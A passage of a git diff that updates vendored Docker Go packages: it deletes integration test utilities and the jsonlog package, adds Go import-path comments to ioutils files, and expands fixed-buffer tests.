-// It changes the date of the system, which can led to weird behaviors.
-func RunAtDifferentDate(date time.Time, block func()) {
-	// Layout for date. MMDDhhmmYYYY
-	const timeLayout = "010203042006"
-	// Ensure we bring time back to now
-	now := time.Now().Format(timeLayout)
-	defer icmd.RunCommand("date", now)
-
-	icmd.RunCommand("date", date.Format(timeLayout))
-	block()
-	return
-}
diff --git a/vendor/github.com/docker/docker/pkg/integration/utils_test.go b/vendor/github.com/docker/docker/pkg/integration/utils_test.go
deleted file mode 100644
index 0b2ef4aff5..0000000000
--- a/vendor/github.com/docker/docker/pkg/integration/utils_test.go
+++ /dev/null
@@ -1,363 +0,0 @@
-package integration
-
-import (
-	"io"
-	"io/ioutil"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"runtime"
-	"strings"
-	"testing"
-	"time"
-)
-
-func TestIsKilledFalseWithNonKilledProcess(t *testing.T) {
-	var lsCmd *exec.Cmd
-	if runtime.GOOS != "windows" {
-		lsCmd = exec.Command("ls")
-	} else {
-		lsCmd = exec.Command("cmd", "/c", "dir")
-	}
-
-	err := lsCmd.Run()
-	if IsKilled(err) {
-		t.Fatalf("Expected the ls command to not be killed, was.")
-	}
-}
-
-func TestIsKilledTrueWithKilledProcess(t *testing.T) {
-	var longCmd *exec.Cmd
-	if runtime.GOOS != "windows" {
-		longCmd = exec.Command("top")
-	} else {
-		longCmd = exec.Command("powershell", "while ($true) { sleep 1 }")
-	}
-
-	// Start a command
-	err := longCmd.Start()
-	if err != nil {
-		t.Fatal(err)
-	}
-	// Capture the error when *dying*
-	done := make(chan error, 1)
-	go func() {
-		done <- longCmd.Wait()
-	}()
-	// Then kill it
-	longCmd.Process.Kill()
-	// Get the error
-	err = <-done
-	if !IsKilled(err) {
-		t.Fatalf("Expected the command to be killed, was not.")
-	}
-}
-
-func TestRunCommandPipelineWithOutputWithNotEnoughCmds(t *testing.T) {
-	_, _, err := RunCommandPipelineWithOutput(exec.Command("ls"))
-	expectedError := "pipeline does not have multiple cmds"
-	if err == nil || err.Error() != expectedError {
-		t.Fatalf("Expected an error with %s, got err:%s", expectedError, err)
-	}
-}
-
-func TestRunCommandPipelineWithOutputErrors(t *testing.T) {
-	p := "$PATH"
-	if runtime.GOOS == "windows" {
-		p = "%PATH%"
-	}
-	cmd1 := exec.Command("ls")
-	cmd1.Stdout = os.Stdout
-	cmd2 := exec.Command("anything really")
-	_, _, err := RunCommandPipelineWithOutput(cmd1, cmd2)
-	if err == nil || err.Error() != "cannot set stdout pipe for anything really: exec: Stdout already set" {
-		t.Fatalf("Expected an error, got %v", err)
-	}
-
-	cmdWithError := exec.Command("doesnotexists")
-	cmdCat := exec.Command("cat")
-	_, _, err = RunCommandPipelineWithOutput(cmdWithError, cmdCat)
-	if err == nil || err.Error() != `starting doesnotexists failed with error: exec: "doesnotexists": executable file not found in `+p {
-		t.Fatalf("Expected an error, got %v", err)
-	}
-}
-
-func TestRunCommandPipelineWithOutput(t *testing.T) {
-	//TODO: Should run on Solaris
-	if runtime.GOOS == "solaris" {
-		t.Skip()
-	}
-	cmds := []*exec.Cmd{
-		// Print 2 characters
-		exec.Command("echo", "-n", "11"),
-		// Count the number or char from stdin (previous command)
-		exec.Command("wc", "-m"),
-	}
-	out, exitCode, err := RunCommandPipelineWithOutput(cmds...)
-	expectedOutput := "2\n"
-	if out != expectedOutput || exitCode != 0 || err != nil {
-		t.Fatalf("Expected %s for commands %v, got out:%s, exitCode:%d, err:%v", expectedOutput, cmds, out, exitCode, err)
-	}
-}
-
-func TestConvertSliceOfStringsToMap(t *testing.T) {
-	input := []string{"a", "b"}
-	actual := ConvertSliceOfStringsToMap(input)
-	for _, key := range input {
-		if _, ok := actual[key]; !ok {
-			t.Fatalf("Expected output to contains key %s, did not: %v", key, actual)
-		}
-	}
-}
-
-func TestCompareDirectoryEntries(t *testing.T) {
-	tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-compare-directories")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpFolder)
-
-	file1 := filepath.Join(tmpFolder, "file1")
-	file2 := filepath.Join(tmpFolder, "file2")
-	os.Create(file1)
-	os.Create(file2)
-
-	fi1, err := os.Stat(file1)
-	if err != nil {
-		t.Fatal(err)
-	}
-	fi1bis, err := os.Stat(file1)
-	if err != nil {
-		t.Fatal(err)
-	}
-	fi2, err := os.Stat(file2)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	cases := []struct {
-		e1          []os.FileInfo
-		e2          []os.FileInfo
-		shouldError bool
-	}{
-		// Empty directories
-		{
-			[]os.FileInfo{},
-			[]os.FileInfo{},
-			false,
-		},
-		// Same FileInfos
-		{
-			[]os.FileInfo{fi1},
-			[]os.FileInfo{fi1},
-			false,
-		},
-		// Different FileInfos but same names
-		{
-			[]os.FileInfo{fi1},
-			[]os.FileInfo{fi1bis},
-			false,
-		},
-		// Different FileInfos, different names
-		{
-			[]os.FileInfo{fi1},
-			[]os.FileInfo{fi2},
-			true,
-		},
-	}
-	for _, elt := range cases {
-		err := CompareDirectoryEntries(elt.e1, elt.e2)
-		if elt.shouldError && err == nil {
-			t.Fatalf("Should have return an error, did not with %v and %v", elt.e1, elt.e2)
-		}
-		if !elt.shouldError && err != nil {
-			t.Fatalf("Should have not returned an error, but did : %v with %v and %v", err, elt.e1, elt.e2)
-		}
-	}
-}
-
-// FIXME make an "unhappy path" test for ListTar without "panicking" :-)
-func TestListTar(t *testing.T) {
-	// TODO Windows: Figure out why this fails. Should be portable.
-	if runtime.GOOS == "windows" {
-		t.Skip("Failing on Windows - needs further investigation")
-	}
-	tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-list-tar")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpFolder)
-
-	// Let's create a Tar file
-	srcFile := filepath.Join(tmpFolder, "src")
-	tarFile := filepath.Join(tmpFolder, "src.tar")
-	os.Create(srcFile)
-	cmd := exec.Command("sh", "-c", "tar cf "+tarFile+" "+srcFile)
-	_, err = cmd.CombinedOutput()
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	reader, err := os.Open(tarFile)
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer reader.Close()
-
-	entries, err := ListTar(reader)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(entries) != 1 && entries[0] != "src" {
-		t.Fatalf("Expected a tar file with 1 entry (%s), got %v", srcFile, entries)
-	}
-}
-
-func TestRandomTmpDirPath(t *testing.T) {
-	path := RandomTmpDirPath("something", runtime.GOOS)
-
-	prefix := "/tmp/something"
-	if runtime.GOOS == "windows" {
-		prefix = os.Getenv("TEMP") + `\something`
-	}
-	expectedSize := len(prefix) + 11
-
-	if !strings.HasPrefix(path, prefix) {
-		t.Fatalf("Expected generated path to have '%s' as prefix, got %s'", prefix, path)
-	}
-	if len(path) != expectedSize {
-		t.Fatalf("Expected generated path to be %d, got %d", expectedSize, len(path))
-	}
-}
-
-func TestConsumeWithSpeed(t *testing.T) {
-	reader := strings.NewReader("1234567890")
-	chunksize := 2
-
-	bytes1, err := ConsumeWithSpeed(reader, chunksize, 1*time.Second, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if bytes1 != 10 {
-		t.Fatalf("Expected to have read 10 bytes, got %d", bytes1)
-	}
-
-}
-
-func TestConsumeWithSpeedWithStop(t *testing.T) {
-	reader := strings.NewReader("1234567890")
-	chunksize := 2
-
-	stopIt := make(chan bool)
-
-	go func() {
-		time.Sleep(1 * time.Millisecond)
-		stopIt <- true
-	}()
-
-	bytes1, err := ConsumeWithSpeed(reader, chunksize, 20*time.Millisecond, stopIt)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if bytes1 != 2 {
-		t.Fatalf("Expected to have read 2 bytes, got %d", bytes1)
-	}
-
-}
-
-func TestParseCgroupPathsEmpty(t *testing.T) {
-	cgroupMap := ParseCgroupPaths("")
-	if len(cgroupMap) != 0 {
-		t.Fatalf("Expected an empty map, got %v", cgroupMap)
-	}
-	cgroupMap = ParseCgroupPaths("\n")
-	if len(cgroupMap) != 0 {
-		t.Fatalf("Expected an empty map, got %v", cgroupMap)
-	}
-	cgroupMap = ParseCgroupPaths("something:else\nagain:here")
-	if len(cgroupMap) != 0 {
-		t.Fatalf("Expected an empty map, got %v", cgroupMap)
-	}
-}
-
-func TestParseCgroupPaths(t *testing.T) {
-	cgroupMap := ParseCgroupPaths("2:memory:/a\n1:cpuset:/b")
-	if len(cgroupMap) != 2 {
-		t.Fatalf("Expected a map with 2 entries, got %v", cgroupMap)
-	}
-	if value, ok := cgroupMap["memory"]; !ok || value != "/a" {
-		t.Fatalf("Expected cgroupMap to contains an entry for 'memory' with value '/a', got %v", cgroupMap)
-	}
-	if value, ok := cgroupMap["cpuset"]; !ok || value != "/b" {
-		t.Fatalf("Expected cgroupMap to contains an entry for 'cpuset' with value '/b', got %v", cgroupMap)
-	}
-}
-
-func TestChannelBufferTimeout(t *testing.T) {
-	expected := "11"
-
-	buf := &ChannelBuffer{make(chan []byte, 1)}
-	defer buf.Close()
-
-	done := make(chan struct{}, 1)
-	go func() {
-		time.Sleep(100 * time.Millisecond)
-		io.Copy(buf, strings.NewReader(expected))
-		done <- struct{}{}
-	}()
-
-	// Wait long enough
-	b := make([]byte, 2)
-	_, err := buf.ReadTimeout(b, 50*time.Millisecond)
-	if err == nil && err.Error() != "timeout reading from channel" {
-		t.Fatalf("Expected an error, got %s", err)
-	}
-	<-done
-}
-
-func TestChannelBuffer(t *testing.T) {
-	expected := "11"
-
-	buf := &ChannelBuffer{make(chan []byte, 1)}
-	defer buf.Close()
-
-	go func() {
-		time.Sleep(100 * time.Millisecond)
-		io.Copy(buf, strings.NewReader(expected))
-	}()
-
-	// Wait long enough
-	b := make([]byte, 2)
-	_, err := buf.ReadTimeout(b, 200*time.Millisecond)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if string(b) != expected {
-		t.Fatalf("Expected '%s', got '%s'", expected, string(b))
-	}
-}
-
-// FIXME doesn't work
-// func TestRunAtDifferentDate(t *testing.T) {
-// 	var date string
-
-// 	// Layout for date. MMDDhhmmYYYY
-// 	const timeLayout = "20060102"
-// 	expectedDate := "20100201"
-// 	theDate, err := time.Parse(timeLayout, expectedDate)
-// 	if err != nil {
-// 		t.Fatal(err)
-// 	}
-
-// 	RunAtDifferentDate(theDate, func() {
-// 		cmd := exec.Command("date", "+%Y%M%d")
-// 		out, err := cmd.Output()
-// 		if err != nil {
-// 			t.Fatal(err)
-// 		}
-// 		date = string(out)
-// 	})
-// }
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go
index 3d737b3e19..466f79294b 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go
index 41098fa6e7..b8887bfde0 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go
@@ -1,10 +1,85 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"bytes"
 	"testing"
 )
 
+func TestFixedBufferCap(t *testing.T) {
+	buf := &fixedBuffer{buf: make([]byte, 0, 5)}
+
+	n := buf.Cap()
+	if n != 5 {
+		t.Fatalf("expected buffer capacity to be 5 bytes, got %d", n)
+	}
+}
+
+func TestFixedBufferLen(t *testing.T) {
+	buf := &fixedBuffer{buf: make([]byte, 0, 10)}
+
+	buf.Write([]byte("hello"))
+	l := buf.Len()
+	if l != 5 {
+		t.Fatalf("expected buffer length to be 5 bytes, got %d", l)
+	}
+
+	buf.Write([]byte("world"))
+	l = buf.Len()
+	if l != 10 {
+		t.Fatalf("expected buffer length to be 10 bytes, got %d", l)
+	}
+
+	// read 5 bytes
+	b := make([]byte, 5)
+	buf.Read(b)
+
+	l = buf.Len()
+	if l != 5 {
+		t.Fatalf("expected buffer length to be 5 bytes, got %d", l)
+	}
+
+	n, err := buf.Write([]byte("i-wont-fit"))
+	if n != 0 {
+		t.Fatalf("expected no bytes to be written to buffer, got %d", n)
+	}
+	if err != errBufferFull {
+		t.Fatalf("expected errBufferFull, got %v", err)
+	}
+
+	l = buf.Len()
+	if l != 5 {
+		t.Fatalf("expected buffer length to still be 5 bytes, got %d", l)
+	}
+
+	buf.Reset()
+	l = buf.Len()
+	if l != 0 {
+		t.Fatalf("expected buffer length to still be 0 bytes, got %d", l)
+	}
+}
+
+func TestFixedBufferString(t *testing.T) {
+	buf := &fixedBuffer{buf: make([]byte, 0, 10)}
+
+	buf.Write([]byte("hello"))
+	buf.Write([]byte("world"))
+
+	out := buf.String()
+	if out != "helloworld" {
+		t.Fatalf("expected output to be \"helloworld\", got %q", out)
+	}
+
+	// read 5 bytes
+	b := make([]byte, 5)
+	buf.Read(b)
+
+	// test that fixedBuffer.String() only returns the part that hasn't been read
+	out = buf.String()
+	if out != "world" {
+		t.Fatalf("expected output to be \"world\", got %q", out)
+	}
+}
+
 func TestFixedBufferWrite(t *testing.T) {
 	buf := &fixedBuffer{buf: make([]byte, 0, 64)}
 	n, err := buf.Write([]byte("hello"))
@@ -21,6 +96,9 @@ func TestFixedBufferWrite(t *testing.T) {
 	}
 
 	n, err = buf.Write(bytes.Repeat([]byte{1}, 64))
+	if n != 59 {
+		t.Fatalf("expected 59 bytes written before buffer is full, got %d", n)
+	}
 	if err != errBufferFull {
 		t.Fatalf("expected errBufferFull, got %v - %v", err, buf.buf[:64])
 	}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go
index 72a04f3491..d4bbf3c9dc 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go
index 300fb5f6d5..9101f20a21 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"crypto/sha1"
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go
deleted file mode 100644
index 0b04b0ba3e..0000000000
--- a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go
+++ /dev/null
@@ -1,22 +0,0 @@
-package ioutils
-
-import (
-	"fmt"
-	"io"
-)
-
-// FprintfIfNotEmpty prints the string value if it's not empty
-func FprintfIfNotEmpty(w io.Writer, format, value string) (int, error) {
-	if value != "" {
-		return fmt.Fprintf(w, format, value)
-	}
-	return 0, nil
-}
-
-// FprintfIfTrue prints the boolean value if it's true
-func FprintfIfTrue(w io.Writer, format string, ok bool) (int, error) {
-	if ok {
-		return fmt.Fprintf(w, format, ok)
-	}
-	return 0, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go
deleted file mode 100644
index 8968863296..0000000000
--- a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go
+++ /dev/null
@@ -1,17 +0,0 @@
-package ioutils
-
-import "testing"
-
-func TestFprintfIfNotEmpty(t *testing.T) {
-	wc := NewWriteCounter(&NopWriter{})
-	n, _ := FprintfIfNotEmpty(wc, "foo%s", "")
-
-	if wc.Count != 0 || n != 0 {
-		t.Errorf("Wrong count: %v vs. %v vs. 0", wc.Count, n)
-	}
-
-	n, _ = FprintfIfNotEmpty(wc, "foo%s", "bar")
-	if wc.Count != 6 || n != 6 {
-		t.Errorf("Wrong count: %v vs. %v vs. 6", wc.Count, n)
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go
index a56c462651..534d66ac26 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go
index c4d1419306..b283045de5 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"bytes"
@@ -37,7 +37,7 @@ func TestAtomicWriteToFile(t *testing.T) {
 		t.Fatalf("Error reading from file: %v", err)
 	}
 
-	if bytes.Compare(actual, expected) != 0 {
+	if !bytes.Equal(actual, expected) {
 		t.Fatalf("Data mismatch, expected %q, got %q", expected, actual)
 	}
 
@@ -85,7 +85,7 @@ func TestAtomicWriteSetCommit(t *testing.T) {
 		t.Fatalf("Error reading from file: %v", err)
 	}
 
-	if bytes.Compare(actual, expected) != 0 {
+	if !bytes.Equal(actual, expected) {
 		t.Fatalf("Data mismatch, expected %q, got %q", expected, actual)
 	}
 
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers.go b/vendor/github.com/docker/docker/pkg/ioutils/readers.go
index 63f3c07f46..1f657bd3dc 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/readers.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/readers.go
@@ -1,25 +1,28 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
+	"context"
 	"crypto/sha256"
 	"encoding/hex"
 	"io"
-
-	"golang.org/x/net/context"
 )
 
-type readCloserWrapper struct {
+// ReadCloserWrapper wraps an io.Reader, and implements an io.ReadCloser
+// It calls the given callback function when closed. It should be constructed
+// with NewReadCloserWrapper
+type ReadCloserWrapper struct {
 	io.Reader
 	closer func() error
 }
 
-func (r *readCloserWrapper) Close() error {
+// Close calls back the passed closer function
+func (r *ReadCloserWrapper) Close() error {
 	return r.closer()
 }
 
 // NewReadCloserWrapper returns a new io.ReadCloser.
 func NewReadCloserWrapper(r io.Reader, closer func() error) io.ReadCloser {
-	return &readCloserWrapper{
+	return &ReadCloserWrapper{
 		Reader: r,
 		closer: closer,
 	}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go
index 9abc1054df..e645c78d83 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go
@@ -1,20 +1,22 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
+	"context"
 	"fmt"
 	"io/ioutil"
 	"strings"
 	"testing"
 	"time"
 
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 // Implement io.Reader
 type errorReader struct{}
 
 func (r *errorReader) Read(p []byte) (int, error) {
-	return 0, fmt.Errorf("Error reader always fail.")
+	return 0, fmt.Errorf("error reader always fail")
 }
 
 func TestReadCloserWrapperClose(t *testing.T) {
@@ -35,9 +37,7 @@ func TestReaderErrWrapperReadOnError(t *testing.T) {
 		called = true
 	})
 	_, err := wrapper.Read([]byte{})
-	if err == nil || !strings.Contains(err.Error(), "Error reader always fail.") {
-		t.Fatalf("readErrWrapper should returned an error")
-	}
+	assert.Check(t, is.Error(err, "error reader always fail"))
 	if !called {
 		t.Fatalf("readErrWrapper should have call the anonymous function on failure")
 	}
@@ -80,7 +80,8 @@ func (p *perpetualReader) Read(buf []byte) (n int, err error) {
 }
 
 func TestCancelReadCloser(t *testing.T) {
-	ctx, _ := context.WithTimeout(context.Background(), 100*time.Millisecond)
+	ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond)
+	defer cancel()
 	cancelReadCloser := NewCancelReadCloser(ctx, ioutil.NopCloser(&perpetualReader{}))
 	for {
 		var buf [128]byte
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go
index 1539ad21b5..dc894f9131 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import "io/ioutil"
 
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go
index c258e5fdd8..ecaba2e36d 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go
index 52a4901ade..91b8d18266 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers.go b/vendor/github.com/docker/docker/pkg/ioutils/writers.go
index ccc7f9c23e..61c679497d 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/writers.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/writers.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import "io"
 
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go
index 564b1cd4f5..94d446f9a9 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go
+++ b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go
@@ -1,4 +1,4 @@
-package ioutils
+package ioutils // import "github.com/docker/docker/pkg/ioutils"
 
 import (
 	"bytes"
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go
deleted file mode 100644
index 4734c31119..0000000000
--- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go
+++ /dev/null
@@ -1,42 +0,0 @@
-package jsonlog
-
-import (
-	"encoding/json"
-	"fmt"
-	"time"
-)
-
-// JSONLog represents a log message, typically a single entry from a given log stream.
-// JSONLogs can be easily serialized to and from JSON and support custom formatting.
-type JSONLog struct {
-	// Log is the log message
-	Log string `json:"log,omitempty"`
-	// Stream is the log source
-	Stream string `json:"stream,omitempty"`
-	// Created is the created timestamp of log
-	Created time.Time `json:"time"`
-	// Attrs is the list of extra attributes provided by the user
-	Attrs map[string]string `json:"attrs,omitempty"`
-}
-
-// Format returns the log formatted according to format
-// If format is nil, returns the log message
-// If format is json, returns the log marshaled in json format
-// By default, returns the log with the log time formatted according to format.
-func (jl *JSONLog) Format(format string) (string, error) {
-	if format == "" {
-		return jl.Log, nil
-	}
-	if format == "json" {
-		m, err := json.Marshal(jl)
-		return string(m), err
-	}
-	return fmt.Sprintf("%s %s", jl.Created.Format(format), jl.Log), nil
-}
-
-// Reset resets the log to nil.
-func (jl *JSONLog) Reset() {
-	jl.Log = ""
-	jl.Stream = ""
-	jl.Created = time.Time{}
-}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go
deleted file mode 100644
index 83ce684a8e..0000000000
--- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go
+++ /dev/null
@@ -1,178 +0,0 @@
-// This code was initially generated by ffjson <https://github.com/pquerna/ffjson>
-// This code was generated via the following steps:
-// $ go get -u github.com/pquerna/ffjson
-// $ make BIND_DIR=. shell
-// $ ffjson pkg/jsonlog/jsonlog.go
-// $ mv pkg/jsonglog/jsonlog_ffjson.go pkg/jsonlog/jsonlog_marshalling.go
-//
-// It has been modified to improve the performance of time marshalling to JSON
-// and to clean it up.
-// Should this code need to be regenerated when the JSONLog struct is changed,
-// the relevant changes which have been made are:
-// import (
-//        "bytes"
-//-
-//        "unicode/utf8"
-// )
-//
-// func (mj *JSONLog) MarshalJSON() ([]byte, error) {
-//@@ -20,13 +16,13 @@ func (mj *JSONLog) MarshalJSON() ([]byte, error) {
-//        }
-//        return buf.Bytes(), nil
-// }
-//+
-// func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
-//-       var err error
-//-       var obj []byte
-//-       var first bool = true
-//-       _ = obj
-//-       _ = err
-//-       _ = first
-//+       var (
-//+               err       error
-//+               timestamp string
-//+               first     bool = true
-//+       )
-//        buf.WriteString(`{`)
-//        if len(mj.Log) != 0 {
-//                if first == true {
-//@@ -52,11 +48,11 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
-//                buf.WriteString(`,`)
-//        }
-//        buf.WriteString(`"time":`)
-//-       obj, err = mj.Created.MarshalJSON()
-//+       timestamp, err = FastTimeMarshalJSON(mj.Created)
-//        if err != nil {
-//                return err
-//        }
-//-       buf.Write(obj)
-//+       buf.WriteString(timestamp)
-//        buf.WriteString(`}`)
-//        return nil
-// }
-// @@ -81,9 +81,10 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
-//         if len(mj.Log) != 0 {
-// -                if first == true {
-// -                       first = false
-// -               } else {
-// -                       buf.WriteString(`,`)
-// -               }
-// +               first = false
-//                 buf.WriteString(`"log":`)
-//                 ffjsonWriteJSONString(buf, mj.Log)
-//         }
-
-package jsonlog
-
-import (
-	"bytes"
-	"unicode/utf8"
-)
-
-// MarshalJSON marshals the JSONLog.
-func (mj *JSONLog) MarshalJSON() ([]byte, error) {
-	var buf bytes.Buffer
-	buf.Grow(1024)
-	if err := mj.MarshalJSONBuf(&buf); err != nil {
-		return nil, err
-	}
-	return buf.Bytes(), nil
-}
-
-// MarshalJSONBuf marshals the JSONLog and stores the result to a bytes.Buffer.
-func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
-	var (
-		err       error
-		timestamp string
-		first     = true
-	)
-	buf.WriteString(`{`)
-	if len(mj.Log) != 0 {
-		first = false
-		buf.WriteString(`"log":`)
-		ffjsonWriteJSONString(buf, mj.Log)
-	}
-	if len(mj.Stream) != 0 {
-		if first {
-			first = false
-		} else {
-			buf.WriteString(`,`)
-		}
-		buf.WriteString(`"stream":`)
-		ffjsonWriteJSONString(buf, mj.Stream)
-	}
-	if !first {
-		buf.WriteString(`,`)
-	}
-	buf.WriteString(`"time":`)
-	timestamp, err = FastTimeMarshalJSON(mj.Created)
-	if err != nil {
-		return err
-	}
-	buf.WriteString(timestamp)
-	buf.WriteString(`}`)
-	return nil
-}
-
-func ffjsonWriteJSONString(buf *bytes.Buffer, s string) {
-	const hex = "0123456789abcdef"
-
-	buf.WriteByte('"')
-	start := 0
-	for i := 0; i < len(s); {
-		if b := s[i]; b < utf8.RuneSelf {
-			if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' {
-				i++
-				continue
-			}
-			if start < i {
-				buf.WriteString(s[start:i])
-			}
-			switch b {
-			case '\\', '"':
-				buf.WriteByte('\\')
-				buf.WriteByte(b)
-			case '\n':
-				buf.WriteByte('\\')
-				buf.WriteByte('n')
-			case '\r':
-				buf.WriteByte('\\')
-				buf.WriteByte('r')
-			default:
-
-				buf.WriteString(`\u00`)
-				buf.WriteByte(hex[b>>4])
-				buf.WriteByte(hex[b&0xF])
-			}
-			i++
-			start = i
-			continue
-		}
-		c, size := utf8.DecodeRuneInString(s[i:])
-		if c == utf8.RuneError && size == 1 {
-			if start < i {
-				buf.WriteString(s[start:i])
-			}
-			buf.WriteString(`\ufffd`)
-			i += size
-			start = i
-			continue
-		}
-
-		if c == '\u2028' || c == '\u2029' {
-			if start < i {
-				buf.WriteString(s[start:i])
-			}
-			buf.WriteString(`\u202`)
-			buf.WriteByte(hex[c&0xF])
-			i += size
-			start = i
-			continue
-		}
-		i += size
-	}
-	if start < len(s) {
-		buf.WriteString(s[start:])
-	}
-	buf.WriteByte('"')
-}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go
deleted file mode 100644
index 3edb271410..0000000000
--- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go
+++ /dev/null
@@ -1,34 +0,0 @@
-package jsonlog
-
-import (
-	"regexp"
-	"testing"
-)
-
-func TestJSONLogMarshalJSON(t *testing.T) {
-	logs := map[*JSONLog]string{
